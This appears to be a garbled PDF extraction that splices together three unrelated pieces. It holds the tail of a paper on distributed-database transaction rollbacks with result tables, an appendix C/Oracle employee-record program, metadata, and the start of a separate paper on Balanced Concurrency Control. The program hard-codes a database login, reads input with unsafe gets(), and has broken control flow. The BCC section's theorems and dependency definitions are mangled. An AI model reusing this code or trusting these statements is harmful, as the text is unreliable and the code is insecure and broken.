- Adding more system information does not necessarily lead to better approximations. In this paper, the system information is increased from model 5 to model 2. Even though this increases the computational complexity, it does not result in any significant improvement in the estimation of number of rollbacks.
- Model 1 represents a specific system. Here, we define the transactions completely. Thus it is closer to a real-life situation. Results (analytical or simulation) obtained from this model represent actual behavior of the specified system. However, results obtained from such a model are too specific, and can't be extended for other systems.
- Transaction commutativity appears to significantly reduce transaction rollbacks in a partitioned distributed database system. This fact is only evident from the analysis of model 1. On the other hand, when we look at models 2-6, it is possible to conclude that commutativity is not helpful unless it is very very high. Thus, conclusions from model 1 and models 2-6 appear to be contradictory. Since models 3-6 assume average transactions that can randomly select any data item to read (or write), the evaluations from these models are likely to predict higher conflicts and hence more rollbacks. The benefits due to commutativity seem to disappear in the average behavior. Model 1, on the other hand, describes a specific system, and hence can accurately compute the rollbacks. It is also able to predict the benefits due to commutativity more accurately.
- The distribution of number of copies seems to affect the evaluations significantly. Thus, accurate modeling of this distribution is vital to evaluation of rollbacks.
In addition to developing several system models and evaluation techniques for these models, this paper has one significant contribution to the modeling, simulation, and performance analysis community.
If an abstract system model with average information is employed to evaluate the effectiveness of a new technique or a new concept, then we should only expect conservative estimates of the effects. In other words, if the results from the average models are positive, then accept the results. If these are negative, then repeat the analysis with a less abstracted model. Concepts/techniques that are not appropriate for an average system may still be applicable for some specific systems.
Table 1. Effect of Number of Partitions on Rollbacks
<table>
<thead>
<tr>
<th>Model</th>
<th>( p_1 = 4, p_2 = 6, c = 3 )</th>
<th>( p_1 = 4, p_2 = 3, c = 3 )</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Before</td>
<td>After</td>
</tr>
<tr>
<td>Sim.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>50200</td>
<td>49965</td>
</tr>
<tr>
<td>2</td>
<td>48315</td>
<td>43297</td>
</tr>
<tr>
<td>3</td>
<td>48315</td>
<td>43297</td>
</tr>
<tr>
<td>4</td>
<td>48618</td>
<td>43297</td>
</tr>
<tr>
<td>5</td>
<td>47276</td>
<td>43297</td>
</tr>
<tr>
<td>6</td>
<td>46593</td>
<td>43297</td>
</tr>
</tbody>
</table>
Table 2. Effect of Number of Copies on Rollbacks
<table>
<thead>
<tr>
<th>Model</th>
<th>( p_1 = 4, p_2 = 6, c = 2 )</th>
<th>( p_1 = 4, p_2 = 6, c = 8 )</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Before</td>
<td>After</td>
</tr>
<tr>
<td>Sim.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>34600</td>
<td>33854</td>
</tr>
<tr>
<td>2</td>
<td>31069</td>
<td>23952</td>
</tr>
<tr>
<td>3</td>
<td>31069</td>
<td>23952</td>
</tr>
<tr>
<td>4</td>
<td>31595</td>
<td>24134</td>
</tr>
<tr>
<td>5</td>
<td>23203</td>
<td>19309</td>
</tr>
<tr>
<td>6</td>
<td>27138</td>
<td>22024</td>
</tr>
</tbody>
</table>
Table 3. Effect of Number of Nodes on Rollbacks
<table>
<thead>
<tr>
<th>Model</th>
<th>( p_1 = 10, p_2 = 10, c = 5 )</th>
<th>( p_1 = 10, p_2 = 10, c = 12 )</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Before</td>
<td>After</td>
</tr>
<tr>
<td>Sim.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>61250</td>
<td>50110</td>
</tr>
<tr>
<td>2</td>
<td>61250</td>
<td>50110</td>
</tr>
<tr>
<td>3</td>
<td>61024</td>
<td>30751</td>
</tr>
<tr>
<td>4</td>
<td>61024</td>
<td>30751</td>
</tr>
<tr>
<td>5</td>
<td>61024</td>
<td>30751</td>
</tr>
<tr>
<td>6</td>
<td>60876</td>
<td>30751</td>
</tr>
</tbody>
</table>
ACKNOWLEDGEMENT
This research was sponsored in part by the NASA Langley Research Center under contract NAG-1-1154.
REFERENCES
Effects of Distributed Database Modeling on Evaluation of Transaction Rollbacks
Table 4. Effect of \( m \) on Rollbacks (Models 5 and 6: \( p_1 = 4, p_2 = 6, c = 3 \))
<table>
<thead>
<tr>
<th>Model 5</th>
<th>Model 6</th>
</tr>
</thead>
<tbody>
<tr>
<td>( m )</td>
<td>( R_1 )</td>
</tr>
<tr>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td>Before Merge</td>
<td>After Merge</td>
</tr>
<tr>
<td>0.00</td>
<td>47276</td>
</tr>
<tr>
<td>0.50</td>
<td>47276</td>
</tr>
<tr>
<td>0.80</td>
<td>47276</td>
</tr>
<tr>
<td>0.90</td>
<td>47276</td>
</tr>
<tr>
<td>0.95</td>
<td>47276</td>
</tr>
<tr>
<td>1.00</td>
<td>46726</td>
</tr>
</tbody>
</table>
Table 5. Effect of \( m \) on Rollbacks (Model 2: \( p_1 = 4, p_2 = 6 \))
<table>
<thead>
<tr>
<th>( c = 3 )</th>
<th>( c = 8 )</th>
</tr>
</thead>
<tbody>
<tr>
<td>( m )</td>
<td>( R_1 )</td>
</tr>
<tr>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td>Before Merge</td>
<td>After Merge</td>
</tr>
<tr>
<td>0.00</td>
<td>48315</td>
</tr>
<tr>
<td>0.27</td>
<td>48315</td>
</tr>
<tr>
<td>0.40</td>
<td>48315</td>
</tr>
<tr>
<td>0.77</td>
<td>48315</td>
</tr>
<tr>
<td>0.95</td>
<td>48315</td>
</tr>
<tr>
<td>1.00</td>
<td>48315</td>
</tr>
</tbody>
</table>
Table 6. Effect of \( m \) on Rollbacks (Model 1: \( p_1 = 4, p_2 = 6 \))
<table>
<thead>
<tr>
<th>( c = 3 )</th>
<th>( c = 8 )</th>
</tr>
</thead>
<tbody>
<tr>
<td>( m )</td>
<td>( R_1 )</td>
</tr>
<tr>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td>Before Merge</td>
<td>After Merge</td>
</tr>
<tr>
<td>0.00</td>
<td>50200</td>
</tr>
<tr>
<td>0.27</td>
<td>50200</td>
</tr>
<tr>
<td>0.40</td>
<td>50200</td>
</tr>
<tr>
<td>0.77</td>
<td>50200</td>
</tr>
<tr>
<td>1.00</td>
<td>50200</td>
</tr>
</tbody>
</table>
Table 7. Effect of Variations in # of Copies on Rollbacks
(Model 1: \( p_1 = 4, p_2 = 6, \) w/c: \( m = 0.27, \) wo/c: \( m = 0.0 \))
<table>
<thead>
<tr>
<th>Copy Distribution</th>
<th>Before Merge</th>
<th>After Merge</th>
</tr>
</thead>
<tbody>
<tr>
<td>( d_1 = 500 )</td>
<td>w/c 50200 1000 199 49001</td>
<td>wo/c 50200 4000 1199 45001</td>
</tr>
<tr>
<td>( d_2 = d_4 = 100, d_3 = 300 )</td>
<td>w/c 48300 1000 997 46303</td>
<td>wo/c 48300 4200 1793 42307</td>
</tr>
<tr>
<td>( d_2 = d_4 = 167, d_3 = 166 )</td>
<td>w/c 41400 200 0 41200</td>
<td>wo/c 41400 2000 597 38803</td>
</tr>
<tr>
<td>( d_1 = d_3 = d_4 = d_5 = 100 )</td>
<td>w/c 48400 200 0 48200</td>
<td>wo/c 48400 2000 797 38003</td>
</tr>
<tr>
<td>( d_1 = d_5 = 250 )</td>
<td>w/c 28700 0 0 28700</td>
<td>wo/c 28700 1200 199 27301</td>
</tr>
</tbody>
</table>
This program creates a menu and facilitates updates, inserts and deletes of records in a database. EMPP is an employee database and the program assumes it to be already created with the following fields:
EMPNO (employee number) of type numeric
ENAME (employee name) of type character
SAL (salary) of type numeric with provision for 2 places after decimal
DEPTNO (department number) of type numeric
JOB (job name) of type character
#include <stdio.h>
#include <ctype.h>
EXEC SQL BEGIN DECLARE SECTION;
VARCHAR uid[80]; /* variable for user id */
VARCHAR pwd[20]; /* variable for password */
int empno; /* host variable for primary key - employee number */
VARCHAR ename[15]; /* host variable for employee name */
int deptno; /* department number */
VARCHAR job[15]; /* host variable for job */
int sal; /* host variable for salary */
int l = 0; /* host variable to hold the length of the string - a value returned by the asks() function. */
int count; /* a variable to obtain number of records in the database with the same primary key value */
int reply = 0; /* variable to obtain the whether a new value exists */
int choice = 0; /* variable defined to obtain value for the menu */
int code; /* variable to print to the ascii file to indicate whether the record was updated (value=1), inserted (value=2) and deleted (value=3) */
EXEC SQL END DECLARE SECTION;
EXEC SQL INCLUDE SQLCA;
FILE *fp;
main()
{
/* open ascii file in append mode */
fp = fopen("outfile", "a"); /* give the login and password to logon to the database */
strcpy(uid.arr,"rsp");
uid.len = strlen(uid.arr);
strcpy(pwd.arr,"prs");
pwd.len = strlen(pwd.arr);
/* exit in case of an unauthorized accessor to the database */
EXEC SQL WHENEVER SQLERROR GOTO errexit;
EXEC SQL CONNECT :uid IDENTIFIED BY :pwd;
for (;;) {
/* infinite loop begins */
/* menu for selecting update, insert, and delete options */
printf("\n \n 1. Update a record \n");
printf("\n \n 2. Insert a record \n");
printf("\n \n 3. Delete a record \n");
printf("\n \n Select an option 1/2/3 ? \n");
choice = getche();
if (choice == '1') goto update;
else if (choice == '2') goto insert;
else if (choice == '3') goto delete;
else { printf("invalid selection");
exit(1); }
update: /* label for the update option */
/* To ensure that the employee with the given employee number
exists, before update could be made. */
code = 1;
printf(" \n count is %d \n", count);
askn("Enter employee number to be updated: ", &empno);
/* using the COUNT supported by oracle, the number of records
having the desired employee number is assigned the variable count
*/
EXEC SQL SELECT COUNT(EMPNO) INTO :count
FROM EMPP
WHERE EMPNO = :empno;
printf("count is %d \n", count);
if (count == 0)
{ printf("Employee with employee number %d does not exist \n", empno);
exit(1); }
/* retrieve the information from the database whose employee-number
has been requested for, and place the contents of the fields into
C variables for update purposes. */
EXEC SQL SELECT ENAME, SAL, DEPTNO, JOB
INTO :ename, :sal, :deptno, :job
FROM EMPP
WHERE EMPNO = :empno;
/* displays the already existing value for employee name */
/* assign the new employee name if it should be updated */
printf("ename is %s \n", ename.arr);
printf("Do you want to update ENAME:(y/n)?");
reply = getche();
if (reply == 'n'){
ename = ename;
printf("\n ename is %s \n", ename.arr);
}
if (reply == 'y') {
l = asks("\n enter employee name : ", ename.arr);
printf("new ename is %s \n", ename.arr);
}
/* displays the already existing value for job name */
/* assign the new job if it should be updated */
printf("do you want to update job-name:(y/n)?");
reply = getche();
if (reply == 'n'){
job = job;
printf("\n job-name is %s \n", job.arr);
}
if (reply == 'y') {
job.len = asks("\n enter employee’s job :", job.arr);
printf("new job-name is %s \n", job.arr);
}
/* displays the already existing value for salary */
/* assign new salary if it should be updated */
printf("Do you want to update salary:(y/n) ");
reply = getche();
if (reply == 'n'){
sal = sal;
printf("\n salary is %d \n", sal);
}
if (reply == 'y') {
askn("\n enter employee’s salary: ", &sal);
printf("new salary is %d \n", sal);
}
/* displays the already existing value for department number */
/* assign the new department number if it should be updated */
printf("Do you want to update deptno :(y/n) ");
reply = getche();
if (reply == 'n'){
deptno = deptno;
printf("\n deptno is %d \n", deptno);
}
if (reply == 'y'){
askn("\n Enter employee dept : ", &deptno);
printf("new deptno is %d \n", deptno);} /* update the database with the new values */
EXEC SQL UPDATE EMPP
SET ENAME = :ename, SAL = :sal, DEPTNO = :deptno, JOB = :job
WHERE EMPNO = :empno;
printf("\n %s with employee number %d has been updated\n", ename.arr, empno);
fprintf(fp,"%10d %Id %15s", empno, code, ename.arr);
fprintf(fp,"%6d %3d %4s\n", sal, deptno, job.arr);
printf("%10d %15s %6d", empno, ename.arr, sal);
printf("%3d %4s\n", deptno, job.arr);
}
insert: /* label for insertion of record based on the employee number */
{
code = 2;
/* To prevent insertion of a record whose primary key is the same as the primary key of an already existing record */
askn("\n Enter employee number to be inserted:", &empno);
EXEC SQL SELECT COUNT(EMPNO) INTO :count
FROM EMPP
WHERE EMPNO = :empno;
printf("count is %d \n", count);
if (count > 0){
printf("Employee with %d employee number already exists \n", empno);
exit(1);}
else { /* obtain values for various fields to be inserted */
l = ask("Enter employee name : ", ename.arr);
job.len = ask("Enter employee job :", job.arr);
askn("Enter employee salary :", &sal);
askn("Enter employee dept number :", &deptno);
/* insert the values obtained into the database */
EXEC SQL INSERT INTO EMPP(EMPNO, ENAME, JOB, SAL, DEPTNO)
VALUES (:empno, :ename, :job, :sal, :deptno);
/* append the insert into the ascii file */
fprintf(fp,"%10d %ld %15s ", empno, code, ename.arr);
fprintf(fp,"%6d %3d %4s \n", sal, deptno, job.arr);
printf("%10d %15s %6d", empno, ename.arr, sal);
printf("%3d %4s", deptno, job.arr); }
delete: /* label for deletion of records based on employee number */
{
int code = 3;
/* obtain the employee number of the employee to be deleted */
askn("Enter employee number to be deleted :", &empno);
EXEC SQL SELECT COUNT(EMPNO) INTO :count
FROM EMPP
WHERE EMPNO = :empno;
if (count > 0){ /* delete record if it exists */
EXEC SQL DELETE FROM EMPP WHERE EMPNO = :empno;
printf("Employee number %d deleted \n", empno);
fprintf(fp, "%10d %1d\n", empno, code);
}
else {
printf("Employee with number %d does not exist \n", empno);
exit(1);}
}
EXEC SQL COMMIT WORK RELEASE; /* make the changes permanent */
printf ("\n End of the C/ORACLE example program.\n");
return;
fclose(fp);
EXEC SQL WHENEVER SQLERROR CONTINUE;
EXEC SQL ROLLBACK WORK RELEASE; /* in case of inconsistency */
errexit:
errrpt();
}
} /* infinite loop ends */
/* function takes the text to be printed and accepts a string variable from standard input and converts it into numeric - hence is used to obtain values for numeric fields */
int askn(text, variable)
char text[];
int *variable;
{
char s[20];
printf(text);
```c
fflush(stdout);
if (gets(s) == (char *)0)
return(EOF);
*variable = atoi(s);
return(1);
/* function takes the text to be printed and prints it, accepts string values for character variables and is thus used to obtain values for fields of type character. It returns the length of the string value */
int asks(text,variable)
char text[],variable[];
{
printf(text);
fflush(stdout);
return ( gets(variable) == (char *)0 ? EOF : strlen(variable));
}
errrpt()
{
printf("%.70s (%d)\n", sqlca.sqlerrm.sqlerrmc, -sqlca.sqlcode);
return(0);
}
```
|
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19910016642.pdf", "len_cl100k_base": 11142, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 46485, "total-output-tokens": 13569, "length": "2e13", "weborganizer": {"__label__adult": 0.0003745555877685547, "__label__art_design": 0.00031638145446777344, "__label__crime_law": 0.0003800392150878906, "__label__education_jobs": 0.001708984375, "__label__entertainment": 0.0001220703125, "__label__fashion_beauty": 0.0001823902130126953, "__label__finance_business": 0.0007014274597167969, "__label__food_dining": 0.00046706199645996094, "__label__games": 0.0009360313415527344, "__label__hardware": 0.0020236968994140625, "__label__health": 0.0010137557983398438, "__label__history": 0.0003743171691894531, "__label__home_hobbies": 0.0001475811004638672, "__label__industrial": 0.0006303787231445312, "__label__literature": 0.0004346370697021485, "__label__politics": 0.000274658203125, "__label__religion": 0.00046944618225097656, "__label__science_tech": 0.2181396484375, "__label__social_life": 0.00012624263763427734, "__label__software": 0.0172271728515625, "__label__software_dev": 0.75244140625, "__label__sports_fitness": 0.000293731689453125, "__label__transportation": 0.0007500648498535156, "__label__travel": 0.00023508071899414065}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45966, 0.06133]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45966, 0.50414]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45966, 0.88044]], "google_gemma-3-12b-it_contains_pii": [[0, 7244, false], [7244, 13828, null], [13828, 20520, null], [20520, 24478, null], [24478, 31641, null], [31641, 35072, null], [35072, 37958, null], [37958, 37958, null], [37958, 39401, null], [39401, 41113, null], [41113, 42640, null], [42640, 44172, null], [44172, 45393, null], [45393, 45966, null]], "google_gemma-3-12b-it_is_public_document": [[0, 7244, true], [7244, 13828, null], [13828, 20520, null], [20520, 24478, null], [24478, 31641, null], [31641, 35072, null], [35072, 37958, null], [37958, 37958, null], [37958, 39401, null], [39401, 41113, null], [41113, 42640, null], [42640, 44172, null], [44172, 45393, null], [45393, 45966, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45966, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45966, null]], "pdf_page_numbers": [[0, 7244, 1], [7244, 13828, 2], [13828, 20520, 3], [20520, 24478, 4], [24478, 31641, 5], [31641, 35072, 6], [35072, 37958, 7], [37958, 37958, 8], [37958, 39401, 9], [39401, 41113, 10], [41113, 42640, 11], [42640, 44172, 12], [44172, 45393, 13], [45393, 45966, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45966, 0.15682]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
21e50f8b3f880c2892e0c2320956bd49715c7ee6
|
BCC: Reducing False Aborts in Optimistic Concurrency Control with Low Cost for In-Memory Databases
Yuan Yuan¹, Kaibo Wang¹, Rubao Lee¹, Xiaoning Ding², Jing Xing¹, Spyros Blanas¹, Xiaodong Zhang¹
¹The Ohio State University
²New Jersey Institute of Technology
³Institute of Computing Technology, Chinese Academy of Sciences
ABSTRACT
The Optimistic Concurrency Control (OCC) method has been commonly used for in-memory databases to ensure transaction serializability — a transaction will be aborted if its read set has been changed during execution. This simple criterion to abort transactions causes a large proportion of false positives, leading to excessive transaction aborts. Transactions aborted false-positively (i.e., false aborts) waste system resources and can significantly degrade system throughput (as much as 3.68x based on our experiments) when data contention is intensive.
Modern in-memory databases run on systems with increasingly parallel hardware and handle workloads with growing concurrency. They must efficiently deal with data contention in the presence of greater concurrency by minimizing false aborts. This paper presents a new concurrency control method named Balanced Concurrency Control (BCC) which aborts transactions more carefully than OCC does. BCC detects data dependency patterns which can more reliably indicate unserializable transactions than the criterion used in OCC. The paper studies the design options and implementation techniques that can effectively detect data contention by identifying dependency patterns with low overhead. To test the performance of BCC, we have implemented it in Silo and compared its performance against that of the vanilla Silo system with OCC and two-phase locking (2PL). Our extensive experiments with TPC-W-like, TPC-C-like and YCSB workloads demonstrate that when data contention is intensive, BCC can increase throughput by more than 3x versus OCC and more than 2x versus 2PL; meanwhile, BCC has comparable performance with OCC for workloads with low data contention.
1. INTRODUCTION
The rapid increase of memory capacity has made it possible to store the entire OLTP database in the memory of a single server. With memory-resident data, database’s performance bottleneck has shifted from disk I/O to software related overhead such as locking and buffer management [15, 9]. This has triggered the re-design of the database systems for the in-memory data. Of the concurrency control methods that have a great impact on database performance, Optimistic Concurrency Control (OCC) [17] has been favored by recent in-memory databases for high performance and scalability [18, 8, 30, 31, 33, 21].
With the OCC method, a database executes each transaction in three phases: read, validation, and write. In the read phase, the database keeps track of what the transaction reads into a read set and buffers the transaction’s writes into a write set in the transaction’s private storage. In the validation phase, the database validates the transaction’s read set. If the transaction’s read set has been changed, the transaction must be aborted. Otherwise, the transaction proceeds to the write phase, in which the database installs the transaction’s writes to the database storage. The validation and write phases must be executed in the critical section.
OCC is optimistic in the read phase. It assumes that all the transactions can proceed concurrently. Transactions in the read phase cannot block the execution of other transactions. Being optimistic maximizes concurrency level, leading to high scalability and throughput. However, OCC becomes pessimistic in the validation phase. It excessively aborts transactions to ensure serializability. Some aborted transactions may not affect serializability because change in a transaction’s read set is not a sufficient condition that the transaction schedule cannot be serialized. Based on the serializability theory, only transactions forming a cycle in their dependency graph cannot be serialized and should be aborted [13]. The paper refers to the transactions aborted false-positively as false aborts, to differentiate them from the transactions that actually violate the serializability requirement.
A false abort happens when a transaction is aborted by OCC (i.e., read set changed) but it meets the serializability requirement (i.e., not in a cycle in dependency graph). The differences between these two criteria can be illustrated with the following two transactions: \(T_1: r(A) w(B)\) and \(T_2: r(A) w(A)\). Figure 1 shows a schedule of \(T_1\) and \(T_2\). According to OCC’s validation criterion, \(T_2\) can successfully commit since its read set is not changed, while \(T_1\) must be aborted since its read set has been changed by \(T_2\). However, based on the serializability theory, since there is no cycle in the serialization graph (i.e., \(T_1 \xrightarrow{\text{committed}} T_2\)), both \(T_1\) and \(T_2\) should be committed. If both of them were allowed to commit, the database state would be the same as that after \(T_1\) and \(T_2\) execute serially. Since \(T_1\) is aborted by OCC though it should be allowed to commit based on the serializability requirement, the abort is a false abort.
When data contention is low, aborts, as well as false aborts, are rare, being pessimistic in transaction validation will not cause serious performance issues. For example, in-memory OCC databases can achieve throughput of over 500,000 transactions per second un-
under low-contention workloads [30, 31]. However, when data contention becomes intensive, an increasing number of transactions may be aborted false-positively. Data contention becomes intensive with the increase of CPU core counts. Data sets with skewed characteristics, e.g., those in OLTP workloads [28], also intensify contention. Based on our experiments, false aborts can reduce system throughput by 3.68x under a TPC-W-like workload. It is important for databases to provide good performance in both low contention and high contention scenarios.
To completely remove false aborts, database systems must abort transactions based on cycle detection in serialization graphs. The idea of detecting partial cycle dependency to guarantee serializability was first proposed by Cahill et al. [5] for disk-based snapshot isolation databases. However, the techniques are not directly applicable to in-memory databases where transactions are usually very short due to their prohibitive cost. Detecting cycles requires the database to operate on shared data structures such as wait-for graphs, which will significantly impact the system’s scalability, especially for low contention workloads [6].
The dilemma lies between improving the validation with an accurate criterion to abort transactions and maintaining a low overhead for transaction execution. In this paper, we resolve the dilemma by proposing the Balanced Concurrency Control (BCC) method that seeks a sweet spot between being careful and fast. This balances the accuracy and the overhead of transaction validation well. Specifically, in addition to detecting the anti-dependency as OCC does, BCC detects one additional data dependency in a confined search space, which, together with the anti-dependency, forms an essential dependency pattern. This pattern more reliably indicates the existence of a cycle in the transaction dependency graph (i.e., unserializable transaction schedule) than OCC’s criterion. We will show that by examining one additional dependency BCC can effectively reduce false aborts. At the same time, since BCC limits the search space for the additional dependency, the overhead for dependency detection can be effectively controlled through careful system design and implementation.
The paper makes the following contributions. First, it proposes a new concurrency control method for reducing false aborts while retaining OCC’s merits for low contention workloads. Second, the paper proposes an optimized BCC method leveraging the state-of-the-art in-memory database features. Third, the paper studies implementation techniques for minimizing run-time overhead. Fourth, to demonstrate BCC’s effectiveness, we implement it in Silo [30], which is a representative OCC-based in-memory database. Our implementation makes a case of how to adopt BCC in an OCC-based concurrency control kernel. Finally, we comprehensively evaluate BCC’s performance on a 32-core machine. Our results demonstrate that BCC has a decisive performance advantage over OCC when contention becomes intensive. This advantage is due to a reduction in transaction aborts, and an increase in transaction throughput and workload scalability. Meanwhile, BCC has comparable performance with OCC for low contention workloads.
2. BALANCED CONCURRENCY CONTROL
BCC is an optimistic concurrency control method in nature. The key difference between BCC and other optimistic methods lies in the validation phase — how to determine if a transaction schedule is unserializable. In this section we first review the concepts of transaction history and data dependency in databases. Then we present BCC’s transaction model and the essential dependency patterns that BCC utilizes in its validation to guarantee serializability. After that we explain how BCC detects the essential patterns and discuss BCC’s overhead.
2.1 Background
Transaction History. A transaction history is an execution of database transactions which specifies a partial order of transactional operations on database tuples. Similar to previous work [4, 3], we use \( r_i[x_{ij}] \) to represent that transaction \( T_i \) reads the version of tuple \( x_i \) \( j \) to represent that \( T_i \) writes the version of tuple \( x_i \). \( a_i \) to represent that \( T_i \) is committed and \( c_i \) to represent that \( T_i \) is aborted. Given a tuple \( x \)’s two versions, \( x_i \) is generated before \( x_j \) if \( i < j \).
Data Dependency. Data dependencies happen between transactions when they operate on the same tuple and at least one of the operations is write. The types of dependencies are determined by the operation type (read or write) and the order in which the transactions commit.
There are three types of data dependencies.
- Write-Read (wr) dependency: if transaction \( T_i \) reads a tuple that has been committed earlier by another transaction \( T_j \), \( T_j \) is \( wr \) dependent on \( T_i \), denoted as \( T_i \xrightarrow{wr} T_j \).
- Write-Write (ww) dependency: if transaction \( T_i \) commits a tuple that has been committed earlier by another transaction \( T_j \), \( T_i \) is \( ww \) dependent on \( T_j \), denoted as \( T_i \xrightarrow{ww} T_j \).
- Read-Write (rw) dependency: if transaction \( T_i \) commits a tuple that has been read earlier by another transaction \( T_j \), \( T_i \) is \( rw \) dependent on \( T_j \) (or \( T_j \) is anti-dependent on \( T_i \)), denoted as \( T_i \xrightarrow{rw} T_j \). Here, \( T_i \) has already started when \( T_j \) commits.
We use \( T_i \rightarrow T_j \) to denote that \( T_i \) depends on \( T_j \) through any of the above dependency types.
2.2 Essential Dependency Patterns
BCC assumes the following transaction model.
- Each transaction is executed in read, validation and write phases.
- Each transaction can only read committed tuples.
- The validation and write phases must be executed in the critical section.
Note that BCC and OCC [17] have the same transaction model. In the validation phase, BCC exploits essential dependency patterns (or essential patterns for brevity) among transactions to determine unserializable transaction schedules. Each essential pattern specifies that certain data dependencies exist between transactions. We will demonstrate that the existence of an essential pattern is a necessary condition that a transaction schedule is unserializable in databases that satisfy BCC’s transaction model. In this case, BCC ensures serializability by avoiding the essential patterns.
The essential dependency patterns that BCC detects and prevents are described as follows.
Theorem 1 In databases that satisfy BCC’s transaction model, when an unserializable transaction schedule is created, the schedule must...
contain the following transactions $T_1$, $T_2$ and $T_3$ such that (1) $T_3$ is the earliest committed transaction in the schedule; (2) $T_2 \xrightarrow{\text{rw}} T_1$; and (3) $T_1 \xrightarrow{T_3}$ and $T_1$ commits after $T_2$ starts. The data dependency patterns formed by $T_1$, $T_2$ and $T_3$ are called the essential patterns.
**Proof.** When an unserializable transaction schedule is created, a cycle must exist in the transaction dependency graph. Let $T_3$ be the first transaction committed in the schedule. To form the cycle, $T_3$ must be dependent on another transaction (i.e. it should be pointed by an arrow in the dependency cycle). Since a transaction can only read committed tuples, this dependency cannot be a $\text{ww}$ dependency or a $\text{wr}$ dependency (otherwise there would exist another transaction in the schedule that committed earlier than $T_3$ committed, which contradicts with the fact that $T_3$ is the first committed transaction in the schedule). Thus, this dependency must be a $\text{rw}$ dependency. Let the transaction $T_3$ $\text{rw}$ dependent on be $T_2$ (i.e. $T_3 \xrightarrow{\text{rw}} T_2$). $T_3$ must commit after $T_2$ starts. To form the cycle, $T_2$ must also be dependent on a transaction in the cycle. Let the transaction be $T_1$ (i.e. $T_1 \xrightarrow{T_2}$). $T_1$ must commit after $T_2$ starts, because $T_3$ commits after $T_2$ starts and $T_1$ commits later than $T_3$ commits.
**Theorem 2** Transactions aborted by OCC may not be aborted by BCC, while transactions aborted by BCC will always be aborted by OCC.
**Proof.** The dependency $T_2 \xrightarrow{\text{rw}} T_3$ in the essential patterns is the anti-dependency detected by OCC, and the essential patterns examine additional dependencies to decide whether a transaction should be aborted.
BCC utilizes the essential patterns to ensure serializability for three reasons. First, based on Theorem 1, validation based on detecting essential patterns only commits serializable transactions. Second, based on Theorem 2, validation based on detecting essential patterns reduces aborts compared to OCC. Third, the overhead of detecting the essential patterns can be effectively controlled by limiting the search space: BCC excludes all transaction $T_1$ that commit before $T_2$ starts.
### 2.3 Detection of Essential Patterns
A BCC database aborts a transaction if committing the transaction would create an essential pattern. To detect the essential patterns, the database needs to decide: (1) what data dependencies should be examined in each transaction’s validation phase; and (2) what data dependency information should be kept for validating other transactions.
Figure 2 shows all possible essential patterns when an unserializable transaction schedule is created. The essential patterns can be divided into two categories based on when they would be created.
The first category contains three essential patterns that would be created at the time a transaction $T_2$ commits, which are shown in Figures 2(a) to 2(c). To detect these patterns, the database needs to validate if any transaction could be $T_2$ in the essential pattern by checking: (1) if the transaction $T_2$ is anti-dependent on a committed transaction $T_3$, or $T_2 \xrightarrow{\text{rw}} T_1$; and (2) if the transaction $T_2$ is $\text{ww}$-, $\text{wr}$- or $\text{rw}$-dependent on any concurrent transaction $T_1$, or $T_1 \xrightarrow{\text{rw}} T_2$, $T_1 \xrightarrow{\text{wr}} T_2$ or $T_1 \xrightarrow{\text{rw}} T_2$.
The second category only manifests with snapshot transactions that always operate on a consistent snapshot of the database. The essential pattern that would be created at the time snapshot transaction $T_1$ commits is shown in Figure 2(d). In this case, when $T_1$’s snapshot time is before $T_2$’s commit time and $T_1$’s read operation happens after $T_2$ commits, the dependency $T_1 \xrightarrow{\text{rw}} T_2$ can only be detected when $T_1$ commits. To detect this pattern, the database needs to validate if any transaction could be $T_1$ in the essential pattern by checking if the transaction $T_1$ is a snapshot transaction and $T_1$ is anti-dependent on a committed transaction $T_2$ ($T_1 \xrightarrow{\text{rw}} T_2$), which is in turn anti-dependent on another committed transaction $T_3$ ($T_2 \xrightarrow{\text{rw}} T_3$). This requires the database to retain all anti-dependency information.
Algorithm 1 summarizes how BCC validates a transaction $T$ to detect and prevent the essential patterns.
**Algorithm 1** BCC’s validation and write phases for a committing transaction $T$
1: if $T$ is anti-dependent on any committed transaction then
2: record $T$’s anti-dependency information;
3: if $T$ is $\text{wr}$-, $\text{ww}$-, or $\text{rw}$-dependent on any concurrent transaction then
4: abort $T$;
5: end if
6: if $T$ is a snapshot transaction and there exists a transaction $T'$ such that $T$ is anti-dependent on $T'$ and $T'$ is anti-dependent on a committed transaction then
7: abort $T$;
8: end if
9: end if
10: install $T$’s writes and commit $T$;
